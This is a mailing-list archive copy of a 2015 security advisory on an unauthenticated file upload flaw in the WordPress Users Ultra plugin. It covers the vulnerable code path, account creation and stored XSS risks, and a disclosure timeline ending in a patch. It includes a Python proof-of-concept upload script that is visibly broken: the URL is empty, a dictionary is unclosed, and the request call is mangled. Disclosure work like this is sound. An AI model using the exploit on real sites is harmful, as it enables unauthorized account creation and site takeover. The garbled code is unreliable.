lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  PHC 
Open Source and information security mailing list archives
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Tue, 17 Nov 2015 17:43:22 GMT
Subject: WordPress Users Ultra Plugin [Unrestricted File Upload]

* Exploit Title: WordPress Users Ultra Plugin [Unrestricted File Upload]
* Discovery Date: 2015/10/27
* Public Disclosure Date: 2015/12/01
* Exploit Author: Panagiotis Vagenas
* Contact:
* Vendor Homepage:
* Software Link:
* Version: 1.5.50
* Tested on: WordPress 4.3.1
* Category: webapps


WordPress plugin `Users Ultra Plugin` suffers for an unrestricted file upload vulnerability.

Any user (registered or not) can exploit a misbehavior of the plugin in order to upload csv files to the infected website. Although the plugin checks file extension using an extensions white-list (in this case only csv files are white-listed), no other checks (mime, size etc) are taking place. This alone can expose the infected website to a variety of attacks, please see [OWASP Unrestricted File Upload]( to get an idea.


The plugin workflow that could allow a malicious user to exploit this misbehavior is as follows:

1. Upon initialization of the plugin (anytime if it is activated) an instance of `XooUserUser` class is created
2. In the constructor of `XooUserUser` class a check for POST variable `uultra-form-cvs-form-conf` is taking place
    file `wp-content/plugins/users-ultra/xooclasses/xoo.userultra.user.php` lines 19-23
    if (isset($_POST['uultra-form-cvs-form-conf'])) 
	    /* Let's Update the Profile */
3. Assuming the POST variable `uultra-form-cvs-form-conf` has been set in the request, the method `XooUserUser::process_cvs()` is called.
4. `XooUserUser::process_cvs()` method process every file in $_FILES super-global by only making a check if the file has a `csv` extension

In addition we mark the following points:

1. A malicious user can create and activate user accounts by exploiting this vulnerability if `$_POST["uultra-activate-account"]` is set to `active`
2. A welcome email is send if `$_POST["uultra-send-welcome-email"]` is set to 1
3. The csv files uploaded to the server are stored in a directory (`wp-content/usersultramedia/import` by default) accessible by anyone
4. Any additional columns present in the csv file are stored in `usermeta`
5. No sanitization for values in csv file can easily lead to a Persistent XSS attack, so an attacker can compromise the whole site


The following Python3 script forms a csv file and uploads it to a site

import requests
import csv
import tempfile

url = ''

postData = {
    'uultra-form-cvs-form-conf': 1,
    'uultra-send-welcome-email': 1,
    'uultra-activate-account': 'pending'

csvFileHeader = ['user name', 'email', 'display name', 'registration date', 'first name', 'last name', 'age', 'country']
csvFileRow = ['userName', '', 'User Name', '1/1/1', 'User', 'Name', '100', 'IO']

csvFile = tempfile.NamedTemporaryFile(mode='a+t', suffix='.csv')

wr = csv.writer(csvFile, quoting=csv.QUOTE_ALL, delimiter=',')


files = {'file.csv': csvFile}

r =, data=postData, files=files)



2015/10/29 - Vendor notified via email
2015/11/11 - Vendor notified via contact form in his website
2015/11/13 - Vendor notified via support forums at
2015/11/14 - Vendor responded and received report through email
2015/11/15 - Vendor responded
2015/11/15 - Patch released


Update to version 1.5.59

Powered by blists - more mailing lists